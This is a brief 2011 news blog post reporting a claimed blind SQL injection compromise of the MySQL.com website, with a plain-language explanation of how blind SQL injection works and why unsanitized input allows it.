Home » In Other News

MySQL.com Compromised

Posted 27 Mar 2011 | Comments Off on MySQL.com Compromised | 2,943 views

An email to the Full Disclosure mailing list has indicated that the main MySQL.com website is vulnerable to a blind SQL injection vulnerability. The email from Jack Haxor contained database listings, password hashes, and other data.

An attacker attempting a blind SQL injection attack manipulates the data sent to the SQL query; however, the attacker must work by trial and error rather from error messages returned from the site being attacked. The website under attack masks the SQL errors by returning a generic web page. A SQL injection is attack is successful when an attacker can insert additional SQL to obtain other data that is not intended to be sent to the web page. This type of attack is successful because the website does not properly sanitize data that is being sent to the SQL query. For example, a username field should be restricted to alpha-numeric characters.

An attack of this nature is especially embarrassing, considering that their area of expertise is SQL. The accessed data appears to include customer and certification data as well as their WordPress blog. Oracle acquired MySQL as part of the Sun Microsystems purchase. There are no announcements or responses to the the attack on the MySQL.com website. It is unlikely, but this may turn out to be a hoax.

Comments are closed.